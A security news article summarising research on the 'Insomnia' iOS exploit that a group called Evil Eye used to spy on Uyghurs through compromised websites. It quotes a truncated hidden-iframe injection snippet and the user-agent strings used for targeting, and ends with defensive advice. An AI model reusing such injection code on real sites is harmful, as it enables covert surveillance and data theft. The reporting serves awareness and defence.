New iOS vulnerability being exploited to spy on Uyghurs in China

A newly published report shows that a critical iOS vulnerability is being exploited to spy on the Uyghur minority in China.

Intelligence agencies around the world spy on their own citizens, often under the pretext of "security reasons." While this has met resistance in Western countries, the situation elsewhere is different, and China is in a league of its own.

Last year it was reported that the Chinese government had been using facial-recognition databases, probably for months, to remotely monitor the Uyghur population in the Xinjiang region. Now a research report released by the cybersecurity firm Volexity reveals an iOS vulnerability being exploited to spy on the Uyghur minority in China.

See: “BreedReady” database of 1.8m Chinese women surfaced online

Dubbed Insomnia by the researchers, the exploit was observed in heaviest use from January to March 2020. It works against iOS 12.3, 12.3.1 and 12.3.2; Apple patched the underlying vulnerability in iOS 12.4 in July 2019, so it only succeeds on devices that had gone unpatched for months.

It is worth noting that, according to the researchers, the group behind this campaign is called Evil Eye. The vulnerability is delivered through watering-hole attacks, a technique popular among Chinese hackers and previously used in cyberattacks against the national data center of an unnamed Central Asian country.

In a watering-hole attack, websites that the intended targets are known to visit are compromised and seeded with malicious code, so that visitors unknowingly infect their own devices.

The potential impact of the ongoing campaign is large: according to Apple's own figures, 43% of iPads and 30% of iPhones are still running iOS 12 or earlier.

The data stolen through this attack includes GPS coordinates, contacts, emails from Gmail and ProtonMail, photos from the iPhone Photos app, and messages from numerous messaging platforms such as WhatsApp, Telegram, WeChat, iMessage and Hangouts, including photos sent through the end-to-end encrypted Signal app.

The attack works by first loading the malware from compromised Uyghur-themed websites. The loading methods include, but are not limited to, hidden iframes and modified JavaScript files.

An example of the code found on one website, which loaded the payload through an iframe hidden inside a div styled display: none, was as follows (the base64 data URI is truncated here as in the original; the visible prefix decodes to <html><head><body><iframe src="https://cdn.doublesclick, that is, a second hidden iframe pointing at a lookalike of the DoubleClick ad domain):

<div style="display: none">
<iframe src="data:text/html;base64,PGh0bWw+PGhlYWQ+PGJvZHk+PGlmcmFtZSBzcmM9Imh0dHBzOi8vY2RuLmRvdWJsZXNjbGljaw

Second, the visitor's browser is checked through its user-agent string. The strings the server accepted included the following:

Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 EdgiOS/ Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPad; CPU OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 EdgiOS/44.5.2 Mobile/15E148 Safari/605.1.15

Any browser on iOS fits this criterion, since every iOS browser, whatever its brand, is built on Apple's WebKit engine and reports the same iOS version token. In fact, in their blog post, the researchers stated that they were able to,

“Confirm the successful exploitation of a phone running 12.3.1 via the Apple Safari, Google Chrome, and Microsoft Edge mobile browsers.”

If no such string is found, the server simply returns an "ok" message. If it is found, two malicious JavaScript files named jquery.js and s.js are loaded and the exploit runs, as shown in the illustration above.

It is plausibly believed that this group is backed by the Chinese government, which would make the campaign another example of the crackdown on minority rights and of Beijing's will to exert greater control.

See: Android malware hits Xiaomi devices & minority group in China

Moreover, Evil Eye was previously caught in August 2019, when it was using 14 iOS vulnerabilities against visitors of Uyghur websites through the same techniques. Although the group stopped after Google's report, having operated for almost 3 years, it has now started again with another exploit.

In conclusion, if you have visited any such website, a phone reboot will normally suffice, since the malware has no persistence mechanism that lets it survive a restart. The researchers explain:

The attackers must work quickly to obtain data that they want from a device before it reboots, or they may potentially rely on the ability to reinfect a phone. Alternatively, it may be possible the attackers have a method to maintain persistence but only set this up manually after verifying the target.

Beyond that, avoid visiting potentially compromised websites to reduce the chances of infection, and consider a reputable security app that reports the status of websites as you browse. If you own an Apple device, update it: a reboot only removes the running implant and does nothing about data already exfiltrated, and a device still on iOS 12.3.x can be reinfected on its next visit.
